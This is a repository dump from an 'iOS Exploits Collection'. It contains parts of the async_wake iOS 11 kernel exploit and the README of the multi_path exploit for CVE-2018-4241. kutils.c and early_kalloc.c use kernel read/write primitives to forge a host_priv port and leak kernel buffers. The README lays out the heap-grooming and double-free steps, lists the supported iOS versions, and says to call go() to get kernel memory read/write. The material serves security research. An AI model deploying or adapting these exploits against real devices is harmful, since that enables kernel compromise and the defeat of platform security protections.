14 | "idiom" : "iphone",
15 | "size" : "29x29",
16 | "scale" : "2x"
17 | },
18 | {
19 | "idiom" : "iphone",
20 | "size" : "29x29",
21 | "scale" : "3x"
22 | },
23 | {
24 | "idiom" : "iphone",
25 | "size" : "40x40",
26 | "scale" : "2x"
27 | },
28 | {
29 | "idiom" : "iphone",
30 | "size" : "40x40",
31 | "scale" : "3x"
32 | },
33 | {
34 | "idiom" : "iphone",
35 | "size" : "60x60",
36 | "scale" : "2x"
37 | },
38 | {
39 | "idiom" : "iphone",
40 | "size" : "60x60",
41 | "scale" : "3x"
42 | },
43 | {
44 | "idiom" : "ipad",
45 | "size" : "20x20",
46 | "scale" : "1x"
47 | },
48 | {
49 | "idiom" : "ipad",
50 | "size" : "20x20",
51 | "scale" : "2x"
52 | },
53 | {
54 | "idiom" : "ipad",
55 | "size" : "29x29",
56 | "scale" : "1x"
57 | },
58 | {
59 | "idiom" : "ipad",
60 | "size" : "29x29",
61 | "scale" : "2x"
62 | },
63 | {
64 | "idiom" : "ipad",
65 | "size" : "40x40",
66 | "scale" : "1x"
67 | },
68 | {
69 | "idiom" : "ipad",
70 | "size" : "40x40",
71 | "scale" : "2x"
72 | },
73 | {
74 | "idiom" : "ipad",
75 | "size" : "76x76",
76 | "scale" : "1x"
77 | },
78 | {
79 | "idiom" : "ipad",
80 | "size" : "76x76",
81 | "scale" : "2x"
82 | },
83 | {
84 | "idiom" : "ipad",
85 | "size" : "83.5x83.5",
86 | "scale" : "2x"
87 | },
88 | {
89 | "idiom" : "ios-marketing",
90 | "size" : "1024x1024",
91 | "scale" : "1x"
92 | }
93 | ],
94 | "info" : {
95 | "version" : 1,
96 | "author" : "xcode"
97 | }
98 | }
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/async_wake/async_wake_ios/Base.lproj/LaunchScreen.storyboard:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/async_wake/async_wake_ios/Base.lproj/Main.storyboard:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
26 |
27 |
28 |
29 |
30 |
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/async_wake/async_wake_ios/Info.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | CFBundleDevelopmentRegion
6 | $(DEVELOPMENT_LANGUAGE)
7 | CFBundleExecutable
8 | $(EXECUTABLE_NAME)
9 | CFBundleIdentifier
10 | $(PRODUCT_BUNDLE_IDENTIFIER)
11 | CFBundleInfoDictionaryVersion
12 | 6.0
13 | CFBundleName
14 | $(PRODUCT_NAME)
15 | CFBundlePackageType
16 | APPL
17 | CFBundleShortVersionString
18 | 1.0
19 | CFBundleVersion
20 | 1
21 | LSRequiresIPhoneOS
22 |
23 | UILaunchStoryboardName
24 | LaunchScreen
25 | UIMainStoryboardFile
26 | Main
27 | UIRequiredDeviceCapabilities
28 |
29 | armv7
30 |
31 | UISupportedInterfaceOrientations
32 |
33 | UIInterfaceOrientationPortrait
34 | UIInterfaceOrientationLandscapeLeft
35 | UIInterfaceOrientationLandscapeRight
36 |
37 | UISupportedInterfaceOrientations~ipad
38 |
39 | UIInterfaceOrientationPortrait
40 | UIInterfaceOrientationPortraitUpsideDown
41 | UIInterfaceOrientationLandscapeLeft
42 | UIInterfaceOrientationLandscapeRight
43 |
44 |
45 |
46 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/async_wake/async_wake_ios/ViewController.h:
--------------------------------------------------------------------------------
1 | #import
2 |
3 | @interface ViewController : UIViewController
4 |
5 | @property (weak, nonatomic) IBOutlet UILabel *tfp;
6 |
7 | @end
8 |
9 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/async_wake/async_wake_ios/ViewController.m:
--------------------------------------------------------------------------------
1 | #import "ViewController.h"
2 | #include
3 | #include "async_wake.h"
4 |
5 | @interface ViewController ()
6 |
7 | @end
8 |
9 | @implementation ViewController
10 |
11 | - (void)viewDidLoad {
12 | [super viewDidLoad];
13 | // Do any additional setup after loading the view, typically from a nib.
14 | self.tfp.text = [NSString stringWithFormat:@"tfp: %x", go()];
15 | }
16 |
17 |
18 | - (void)didReceiveMemoryWarning {
19 | printf("******* received memory warning! ***********\n");
20 | [super didReceiveMemoryWarning];
21 | // Dispose of any resources that can be recreated.
22 | }
23 |
24 |
25 | @end
26 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/async_wake/async_wake_ios/arm64_state.h:
--------------------------------------------------------------------------------
1 | #ifndef arm64_state_h
2 | #define arm64_state_h
3 |
4 | /*
5 | * GPR context
6 | */
7 |
8 | struct arm_saved_state32 {
9 | uint32_t r[13]; /* General purpose register r0-r12 */
10 | uint32_t sp; /* Stack pointer r13 */
11 | uint32_t lr; /* Link register r14 */
12 | uint32_t pc; /* Program counter r15 */
13 | uint32_t cpsr; /* Current program status register */
14 | uint32_t far; /* Virtual fault address */
15 | uint32_t esr; /* Exception syndrome register */
16 | uint32_t exception; /* Exception number */
17 | };
18 | typedef struct arm_saved_state32 arm_saved_state32_t;
19 |
20 | struct arm_saved_state32_tagged {
21 | uint32_t tag;
22 | struct arm_saved_state32 state;
23 | };
24 | typedef struct arm_saved_state32_tagged arm_saved_state32_tagged_t;
25 |
26 | #define ARM_SAVED_STATE32_COUNT ((mach_msg_type_number_t) \
27 | (sizeof (arm_saved_state32_t)/sizeof(unsigned int)))
28 |
29 | struct arm_saved_state64 {
30 | uint64_t x[29]; /* General purpose registers x0-x28 */
31 | uint64_t fp; /* Frame pointer x29 */
32 | uint64_t lr; /* Link register x30 */
33 | uint64_t sp; /* Stack pointer x31 */
34 | uint64_t pc; /* Program counter */
35 | uint32_t cpsr; /* Current program status register */
36 | uint32_t reserved; /* Reserved padding */
37 | uint64_t far; /* Virtual fault address */
38 | uint32_t esr; /* Exception syndrome register */
39 | uint32_t exception; /* Exception number */
40 | };
41 | typedef struct arm_saved_state64 arm_saved_state64_t;
42 |
43 | #define ARM_SAVED_STATE64_COUNT ((mach_msg_type_number_t) \
44 | (sizeof (arm_saved_state64_t)/sizeof(unsigned int)))
45 |
46 | struct arm_saved_state {
47 | arm_state_hdr_t ash;
48 | union {
49 | struct arm_saved_state32 ss_32;
50 | struct arm_saved_state64 ss_64;
51 | } uss;
52 | } __attribute__((aligned(16)));
53 | #define ss_32 uss.ss_32
54 | #define ss_64 uss.ss_64
55 |
56 | typedef struct arm_saved_state arm_saved_state_t;
57 |
58 | /*
59 | * NEON context
60 | */
61 | typedef __uint128_t uint128_t;
62 | typedef uint64_t uint64x2_t __attribute__((ext_vector_type(2)));
63 | typedef uint32_t uint32x4_t __attribute__((ext_vector_type(4)));
64 |
65 | struct arm_neon_saved_state32 {
66 | union {
67 | uint128_t q[16];
68 | uint64_t d[32];
69 | uint32_t s[32];
70 | } v;
71 | uint32_t fpsr;
72 | uint32_t fpcr;
73 | };
74 | typedef struct arm_neon_saved_state32 arm_neon_saved_state32_t;
75 |
76 | #define ARM_NEON_SAVED_STATE32_COUNT ((mach_msg_type_number_t) \
77 | (sizeof (arm_neon_saved_state32_t)/sizeof(unsigned int)))
78 |
79 | struct arm_neon_saved_state64 {
80 | union {
81 | uint128_t q[32];
82 | uint64x2_t d[32];
83 | uint32x4_t s[32];
84 | } v;
85 | uint32_t fpsr;
86 | uint32_t fpcr;
87 | };
88 | typedef struct arm_neon_saved_state64 arm_neon_saved_state64_t;
89 |
90 | #define ARM_NEON_SAVED_STATE64_COUNT ((mach_msg_type_number_t) \
91 | (sizeof (arm_neon_saved_state64_t)/sizeof(unsigned int)))
92 |
93 | struct arm_neon_saved_state {
94 | arm_state_hdr_t nsh;
95 | union {
96 | struct arm_neon_saved_state32 ns_32;
97 | struct arm_neon_saved_state64 ns_64;
98 | } uns;
99 | };
100 | typedef struct arm_neon_saved_state arm_neon_saved_state_t;
101 | #define ns_32 uns.ns_32
102 | #define ns_64 uns.ns_64
103 |
104 | struct arm_context {
105 | struct arm_saved_state ss;
106 | struct arm_neon_saved_state ns;
107 | };
108 | typedef struct arm_context arm_context_t;
109 |
110 | #define ARM_SAVED_STATE64 0x15
111 |
112 | #define ARM_DEBUG_STATE64 15
113 | const uint64_t ACT_DEBUGDATA_OFFSET = 0x438;
114 |
115 | struct arm64_debug_state
116 | {
117 | __uint64_t bvr[16];
118 | __uint64_t bcr[16];
119 | __uint64_t wvr[16];
120 | __uint64_t wcr[16];
121 | __uint64_t mdscr_el1; /* Bit 0 is SS (Hardware Single Step) */
122 | };
123 |
124 | struct arm_debug_aggregate_state {
125 | arm_state_hdr_t dsh;
126 | struct arm64_debug_state ds64;
127 | } __attribute__((aligned(16)));
128 |
129 |
130 |
131 | #endif
132 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/async_wake/async_wake_ios/async_wake.h:
--------------------------------------------------------------------------------
1 | #ifndef async_wake_h
2 | #define async_wake_h
3 |
4 | #include
5 | mach_port_t go(void);
6 |
7 | #define CS_VALID 0x0000001 /* dynamically valid */
8 | #define CS_ADHOC 0x0000002 /* ad hoc signed */
9 | #define CS_GET_TASK_ALLOW 0x0000004 /* has get-task-allow entitlement */
10 | #define CS_INSTALLER 0x0000008 /* has installer entitlement */
11 |
12 | #define CS_HARD 0x0000100 /* don't load invalid pages */
13 | #define CS_KILL 0x0000200 /* kill process if it becomes invalid */
14 | #define CS_CHECK_EXPIRATION 0x0000400 /* force expiration checking */
15 | #define CS_RESTRICT 0x0000800 /* tell dyld to treat restricted */
16 | #define CS_ENFORCEMENT 0x0001000 /* require enforcement */
17 | #define CS_REQUIRE_LV 0x0002000 /* require library validation */
18 | #define CS_ENTITLEMENTS_VALIDATED 0x0004000
19 |
20 | #define CS_ALLOWED_MACHO 0x00ffffe
21 |
22 | #define CS_EXEC_SET_HARD 0x0100000 /* set CS_HARD on any exec'ed process */
23 | #define CS_EXEC_SET_KILL 0x0200000 /* set CS_KILL on any exec'ed process */
24 | #define CS_EXEC_SET_ENFORCEMENT 0x0400000 /* set CS_ENFORCEMENT on any exec'ed process */
25 | #define CS_EXEC_SET_INSTALLER 0x0800000 /* set CS_INSTALLER on any exec'ed process */
26 |
27 | #define CS_KILLED 0x1000000 /* was killed by kernel for invalidity */
28 | #define CS_DYLD_PLATFORM 0x2000000 /* dyld used to load this is a platform binary */
29 | #define CS_PLATFORM_BINARY 0x4000000 /* this is a platform binary */
30 | #define CS_PLATFORM_PATH 0x8000000 /* platform binary by the fact of path (osx only) */
31 |
32 | #endif /* async_wake_h */
33 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/async_wake/async_wake_ios/com.apple.iokit.IOMobileGraphicsFamily.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | canvas_height
6 | 1136
7 | canvas_width
8 | 640
9 |
10 |
11 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/async_wake/async_wake_ios/early_kalloc.c:
--------------------------------------------------------------------------------
1 | //
2 | // early_kalloc.c
3 | // async_wake_ios
4 | //
5 | // Created by Ian Beer on 12/11/17.
6 | // Copyright © 2017 Ian Beer. All rights reserved.
7 | //
8 |
9 | #include "early_kalloc.h"
10 |
11 | #include
12 | #include
13 | #include
14 |
15 | #include "find_port.h"
16 | #include "kmem.h"
17 | #include "symbols.h"
18 |
19 | extern int message_size_for_kalloc_size(int kalloc_size);
20 |
21 | // get a kalloc allocation before we've got a kcall interface to just call it
22 | uint64_t early_kalloc(int size) {
23 | mach_port_t port = MACH_PORT_NULL;
24 | kern_return_t err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port);
25 | if (err != KERN_SUCCESS) {
26 | printf("unable to allocate port\n");
27 | }
28 |
29 | uint64_t port_kaddr = find_port_address(port, MACH_MSG_TYPE_MAKE_SEND);
30 |
31 | struct simple_msg {
32 | mach_msg_header_t hdr;
33 | char buf[0];
34 | };
35 |
36 | mach_msg_size_t msg_size = message_size_for_kalloc_size(size);
37 | struct simple_msg* msg = malloc(msg_size);
38 | memset(msg, 0, msg_size);
39 |
40 | msg->hdr.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0);
41 | msg->hdr.msgh_size = msg_size;
42 | msg->hdr.msgh_remote_port = port;
43 | msg->hdr.msgh_local_port = MACH_PORT_NULL;
44 | msg->hdr.msgh_id = 0x41414142;
45 |
46 | err = mach_msg(&msg->hdr,
47 | MACH_SEND_MSG|MACH_MSG_OPTION_NONE,
48 | msg_size,
49 | 0,
50 | MACH_PORT_NULL,
51 | MACH_MSG_TIMEOUT_NONE,
52 | MACH_PORT_NULL);
53 |
54 | if (err != KERN_SUCCESS) {
55 | printf("early kalloc failed to send message\n");
56 | }
57 |
58 | // find the message buffer:
59 |
60 | uint64_t message_buffer = rk64(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE));
61 | printf("message buffer: %llx\n", message_buffer);
62 |
63 | // leak the message buffer:
64 | wk64(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE), 0);
65 | wk32(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT), 0x50000); // this is two uint16_ts, msg_count and qlimit
66 |
67 |
68 | return message_buffer;
69 | }
70 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/async_wake/async_wake_ios/early_kalloc.h:
--------------------------------------------------------------------------------
1 | #ifndef early_kalloc_h
2 | #define early_kalloc_h
3 |
4 | #include
5 |
6 | uint64_t early_kalloc(int size);
7 |
8 | #endif
9 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/async_wake/async_wake_ios/find_port.h:
--------------------------------------------------------------------------------
1 | #ifndef find_port_h
2 | #define find_port_h
3 |
4 | #include
5 |
6 | uint64_t find_port_address(mach_port_t port, int disposition);
7 |
8 | #endif /* find_port_h */
9 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/async_wake/async_wake_ios/kcall.h:
--------------------------------------------------------------------------------
1 | #ifndef kcall_h
2 | #define kcall_h
3 |
4 | void kprintstr(char* msg);
5 | void test_kcall(void);
6 | //void kcall(uint64_t fptr, uint64_t arg0, uint64_t arg1);
7 | uint64_t kcall(uint64_t fptr, uint32_t argc, ...);
8 | #endif
9 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/async_wake/async_wake_ios/kdbg.h:
--------------------------------------------------------------------------------
1 | #ifndef kdbg_h
2 | #define kdbg_h
3 |
4 | void test_kernel_bp(void);
5 | uint64_t pin_current_thread(void);
6 | void test_kdbg(void);
7 | void test_fp(void);
8 |
9 | #endif
10 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/async_wake/async_wake_ios/kmem.h:
--------------------------------------------------------------------------------
1 | #ifndef kmem_h
2 | #define kmem_h
3 |
4 | #include
5 |
6 | uint32_t rk32(uint64_t kaddr);
7 | uint64_t rk64(uint64_t kaddr);
8 |
9 | void wk32(uint64_t kaddr, uint32_t val);
10 | void wk64(uint64_t kaddr, uint64_t val);
11 |
12 | void wkbuffer(uint64_t kaddr, void* buffer, uint32_t length);
13 | void rkbuffer(uint64_t kaddr, void* buffer, uint32_t length);
14 |
15 | void kmemcpy(uint64_t dest, uint64_t src, uint32_t length);
16 |
17 | void kmem_protect(uint64_t kaddr, uint32_t size, int prot);
18 |
19 | uint64_t kmem_alloc(uint64_t size);
20 | uint64_t kmem_alloc_wired(uint64_t size);
21 | void kmem_free(uint64_t kaddr, uint64_t size);
22 |
23 | void prepare_rk_via_kmem_read_port(mach_port_t port);
24 | void prepare_rwk_via_tfp0(mach_port_t port);
25 |
26 | // query whether kmem read or write is present
27 | int have_kmem_read(void);
28 | int have_kmem_write(void);
29 |
30 | #endif
31 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/async_wake/async_wake_ios/kutils.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
4 | #include
5 |
6 | #include "kutils.h"
7 | #include "kmem.h"
8 | #include "find_port.h"
9 | #include "symbols.h"
10 |
11 | uint64_t cached_task_self_addr = 0;
12 | uint64_t task_self_addr() {
13 | if (cached_task_self_addr == 0) {
14 | cached_task_self_addr = find_port_address(mach_task_self(), MACH_MSG_TYPE_COPY_SEND);
15 | printf("task self: 0x%llx\n", cached_task_self_addr);
16 | }
17 | return cached_task_self_addr;
18 | }
19 |
20 | uint64_t ipc_space_kernel() {
21 | return rk64(task_self_addr() + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER));
22 | }
23 |
24 | uint64_t current_thread() {
25 | uint64_t thread_port = find_port_address(mach_thread_self(), MACH_MSG_TYPE_COPY_SEND);
26 | return rk64(thread_port + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));
27 | }
28 |
29 | uint64_t find_kernel_base() {
30 | uint64_t hostport_addr = find_port_address(mach_host_self(), MACH_MSG_TYPE_COPY_SEND);
31 | uint64_t realhost = rk64(hostport_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));
32 |
33 | uint64_t base = realhost & ~0xfffULL;
34 | // walk down to find the magic:
35 | for (int i = 0; i < 0x10000; i++) {
36 | if (rk32(base) == 0xfeedfacf) {
37 | return base;
38 | }
39 | base -= 0x1000;
40 | }
41 | return 0;
42 | }
43 | mach_port_t fake_host_priv_port = MACH_PORT_NULL;
44 |
45 | // build a fake host priv port
46 | mach_port_t fake_host_priv() {
47 | if (fake_host_priv_port != MACH_PORT_NULL) {
48 | return fake_host_priv_port;
49 | }
50 | // get the address of realhost:
51 | uint64_t hostport_addr = find_port_address(mach_host_self(), MACH_MSG_TYPE_COPY_SEND);
52 | uint64_t realhost = rk64(hostport_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));
53 |
54 | // allocate a port
55 | mach_port_t port = MACH_PORT_NULL;
56 | kern_return_t err;
57 | err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port);
58 | if (err != KERN_SUCCESS) {
59 | printf("failed to allocate port\n");
60 | return MACH_PORT_NULL;
61 | }
62 |
63 | // get a send right
64 | mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND);
65 |
66 | // locate the port
67 | uint64_t port_addr = find_port_address(port, MACH_MSG_TYPE_COPY_SEND);
68 |
69 | // change the type of the port
70 | #define IKOT_HOST_PRIV 4
71 | #define IO_ACTIVE 0x80000000
72 | wk32(port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IO_BITS), IO_ACTIVE|IKOT_HOST_PRIV);
73 |
74 | // change the space of the port
75 | wk64(port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER), ipc_space_kernel());
76 |
77 | // set the kobject
78 | wk64(port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT), realhost);
79 |
80 | fake_host_priv_port = port;
81 |
82 | return port;
83 | }
84 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/async_wake/async_wake_ios/kutils.h:
--------------------------------------------------------------------------------
1 | #ifndef kutils_h
2 | #define kutils_h
3 |
4 | #include
5 |
6 | uint64_t task_self_addr(void);
7 | uint64_t ipc_space_kernel(void);
8 | uint64_t find_kernel_base(void);
9 |
10 | uint64_t current_thread(void);
11 |
12 | mach_port_t fake_host_priv(void);
13 |
14 | #endif /* kutils_h */
15 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/async_wake/async_wake_ios/main.m:
--------------------------------------------------------------------------------
1 | #import
2 | #import "AppDelegate.h"
3 |
4 | int main(int argc, char * argv[]) {
5 | @autoreleasepool {
6 | return UIApplicationMain(argc, argv, nil, NSStringFromClass([AppDelegate class]));
7 | }
8 | }
9 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/async_wake/async_wake_ios/symbols.h:
--------------------------------------------------------------------------------
1 | #ifndef symbols_h
2 | #define symbols_h
3 |
4 | #include
5 |
6 | enum kstruct_offset {
7 | /* struct task */
8 | KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE,
9 | KSTRUCT_OFFSET_TASK_REF_COUNT,
10 | KSTRUCT_OFFSET_TASK_ACTIVE,
11 | KSTRUCT_OFFSET_TASK_VM_MAP,
12 | KSTRUCT_OFFSET_TASK_NEXT,
13 | KSTRUCT_OFFSET_TASK_PREV,
14 | KSTRUCT_OFFSET_TASK_ITK_SPACE,
15 | KSTRUCT_OFFSET_TASK_BSD_INFO,
16 |
17 | /* struct ipc_port */
18 | KSTRUCT_OFFSET_IPC_PORT_IO_BITS,
19 | KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES,
20 | KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE,
21 | KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT,
22 | KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER,
23 | KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT,
24 | KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT,
25 | KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS,
26 |
27 | /* struct proc */
28 | KSTRUCT_OFFSET_PROC_PID,
29 |
30 | /* struct ipc_space */
31 | KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE,
32 |
33 | /* struct thread */
34 | KSTRUCT_OFFSET_THREAD_BOUND_PROCESSOR,
35 | KSTRUCT_OFFSET_THREAD_LAST_PROCESSOR,
36 | KSTRUCT_OFFSET_THREAD_CHOSEN_PROCESSOR,
37 | KSTRUCT_OFFSET_THREAD_CONTEXT_DATA, // thread.machine.contextData
38 | KSTRUCT_OFFSET_THREAD_UPCB, // thread.machine.upcb
39 | KSTRUCT_OFFSET_THREAD_UNEON, // thread.machine.uNeon
40 | KSTRUCT_OFFSET_THREAD_KSTACKPTR,
41 |
42 | /* struct processor */
43 | KSTRUCT_OFFSET_PROCESSOR_CPU_ID,
44 |
45 | /* struct cpu_data */
46 | KSTRUCT_OFFSET_CPU_DATA_EXCEPSTACKPTR, // despite the name this actually points to the top of the stack, not the bottom
47 | KSTRUCT_OFFSET_CPU_DATA_CPU_PROCESSOR,
48 | };
49 |
50 |
51 |
52 | // the
53 |
54 | enum ksymbol {
55 | KSYMBOL_OSARRAY_GET_META_CLASS,
56 | KSYMBOL_IOUSERCLIENT_GET_META_CLASS,
57 | KSYMBOL_IOUSERCLIENT_GET_TARGET_AND_TRAP_FOR_INDEX,
58 | KSYMBOL_CSBLOB_GET_CD_HASH,
59 | KSYMBOL_KALLOC_EXTERNAL,
60 | KSYMBOL_KFREE,
61 | KSYMBOL_RET,
62 | KSYMBOL_OSSERIALIZER_SERIALIZE,
63 | KSYMBOL_KPRINTF,
64 | KSYMBOL_UUID_COPY,
65 | KSYMBOL_CPU_DATA_ENTRIES,
66 | KSYMBOL_VALID_LINK_REGISTER,
67 | KSYMBOL_X21_JOP_GADGET,
68 | KSYMBOL_EXCEPTION_RETURN,
69 | KSYMBOL_THREAD_EXCEPTION_RETURN,
70 | KSYMBOL_SET_MDSCR_EL1_GADGET,
71 | KSYMBOL_WRITE_SYSCALL_ENTRYPOINT,
72 | KSYMBOL_EL1_HW_BP_INFINITE_LOOP,
73 | KSYMBOL_SLEH_SYNC_EPILOG
74 | };
75 |
76 | int koffset(enum kstruct_offset);
77 |
78 | uint64_t ksym(enum ksymbol);
79 |
80 | void offsets_init(void);
81 | void symbols_init(void);
82 | int probably_have_correct_symbols(void);
83 |
84 | #endif
85 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/multi_path/README.md:
--------------------------------------------------------------------------------
1 | ### multi_path - exploit for p0 issue 1558 (CVE-2018-4241)
2 | @i41nbeer
3 |
4 | mptcp_usr_connectx is the handler for the connectx syscall for the AP_MULTIPATH socket family.
5 |
6 | The logic of this function fails to correctly handle source and destination sockaddrs which aren't
7 | AF_INET or AF_INET6:
8 |
9 | ```
10 | // verify sa_len for AF_INET:
11 |
12 | if (dst->sa_family == AF_INET &&
13 | dst->sa_len != sizeof(mpte->__mpte_dst_v4)) {
14 | mptcplog((LOG_ERR, "%s IPv4 dst len %u\n", __func__, dst->sa_len), MPTCP_SOCKET_DBG, MPTCP_LOGLVL_ERR);
15 | error = EINVAL;
16 | goto out;
17 | }
18 |
19 | // verify sa_len for AF_INET6:
20 |
21 | if (dst->sa_family == AF_INET6 &&
22 | dst->sa_len != sizeof(mpte->__mpte_dst_v6)) {
23 | mptcplog((LOG_ERR, "%s IPv6 dst len %u\n", __func__, dst->sa_len), MPTCP_SOCKET_DBG, MPTCP_LOGLVL_ERR);
24 | error = EINVAL;
25 | goto out;
26 | }
27 |
28 | // code doesn't bail if sa_family was neither AF_INET nor AF_INET6
29 |
30 | if (!(mpte->mpte_flags & MPTE_SVCTYPE_CHECKED)) {
31 | if (mptcp_entitlement_check(mp_so) < 0) {
32 | error = EPERM;
33 | goto out;
34 | }
35 |
36 | mpte->mpte_flags |= MPTE_SVCTYPE_CHECKED;
37 | }
38 |
39 | // memcpy with sa_len up to 255:
40 |
41 | if ((mp_so->so_state & (SS_ISCONNECTED|SS_ISCONNECTING)) == 0) {
42 | memcpy(&mpte->mpte_dst, dst, dst->sa_len);
43 | }
44 |
45 | ```
46 |
47 | Looking around in the structure which you overflow inside you notice you can hit both fields here:
48 |
49 | if (mpte->mpte_itfinfo_size > MPTE_ITFINFO_SIZE)
50 | _FREE(mpte->mpte_itfinfo, M_TEMP);
51 |
52 | mpte_itfinfo_size is just before mpte_itfinfo.
53 |
54 | When the structure is initialized the mpte_itfinfo pointer points to a small inline array. If more subflows are added
55 | than will fit in there they are instead put in a heap buffer, and mpte_itfinfo will point to that.
56 |
57 | If you had another bug (eg the kernel heap disclosure bug from async_wake) you could overwrite the mpte_itfinfo field
58 | with any valid zone object and it would get free'd (in fact, you could also overwrite it with an offset into that object
59 | for even more fun!)
60 |
61 | However, we don't have that.
62 |
63 | Instead another approach is to partially overwrite the pointer. If we partially overwrite it with NULL bytes we can point
64 | it to a 256 byte, 65k, 16MB or 4GB aligned value.
65 |
66 | In this exploit I choose a 3 byte NULL overwrite, which will cause a kfree of the mpte_itfinfo address rounded down to the
67 | next 16MB boundary.
68 |
69 | The exploitation flow is as follows:
70 |
71 | Allocate alternatingly 16MB of ipc_kmsgs followed by a bunch of mptcp sockets. The goal here is to get a kalloc.2048 allocation
72 | at that 16MB boundary.
73 |
74 | Use the bug to free one of the ipc_kmsgs, moving that page to the intermediate list and putting the 16MB-aligned allocation on a
75 | kalloc.2048 intermediate page freelist.
76 |
77 | Allocate a bunch of filled 2047 byte pipes; the backing buffers for these pipes will come from kalloc.2048, hopefully including our
78 | 16MB-aligned address.
79 |
80 | Trigger the bug a second time, freeing the same address and this time then allocate a bunch of preallocated ipc_kmsg buffers from
81 | kalloc.2048.
82 |
83 | Now we hopefully have an ipc_kmsg (which we can get messages sent to and then receive) and a pipe buffer (which we can read and write)
84 | overlapping each other.
85 |
86 | I use the thread exception port trick from extra_recipe to get messages sent to the prealloced ipc_kmsg buffer. Each time we check each
87 | of the pipes to see if any of them contain the message. When we find the right (ipc_kmsg,pipe) pair we can rewrite the message to send ourselves
88 | a fake port which lives inside the pipe buffer. I structure that fake port like the one from async_wake (which I based on yalu 10.2 by
89 | @qwertyoruiopz and @marcograss) to give me an early kernel read primitive.
90 |
91 | Using the kernel read primitive I find the kernel task and make a fake port which allows easier kernel memory read/write via
92 | mach_vm_read/mach_vm_write.
93 |
94 | Caveat: To connect mptcp sockets you do need the com.apple.developer.networking.multipath entitlement which requires an apple developer cert, which
95 | anyone can buy from Apple.
96 |
97 | Reliability:
98 | This is a security reseach tool and is faaaar from perfect. However, it should work most of the time, and when it does work it should
99 | do a good job of cleaning up so it won't panic later.
100 |
101 | To improve the probability of it working:
102 | * turn off wifi and go in to airplane mode
103 | * reboot
104 | * wait 30 seconds after restarting
105 | * run the app from xcode
106 |
107 | Supported devices:
108 | It should work on iOS 11.0 - 11.3.1 inclusive. I have tested on: iPod Touch 6g, iPhone 6s, iPhone SE, iPhone 7, iPhone 8
109 |
110 | API:
111 | #include "sploit.h" and call go() to run the exploit.
112 | If it worked you can use the functions in kmem.h to read and write kernel memory
113 |
114 | ***Notes***:
115 | Multiple people have publically bindiff'ed this bug from the patch (or their 0day got patched ;) read their stuff for more details:
116 | @elvanderb gave a lightning talk about the bug at rump.beer in Paris on May 31st: https://www.rump.beer/2018/slides/ios_48h.pdf
117 | @jaakerblom published a working exploit on github on June 1st: https://github.com/potmdehex/multipath_kfree
118 | John's technique is similar to mine but he does a two-byte overflow rather than a three byte one, and replaces with different objects. good stuff!
119 |
--------------------------------------------------------------------------------
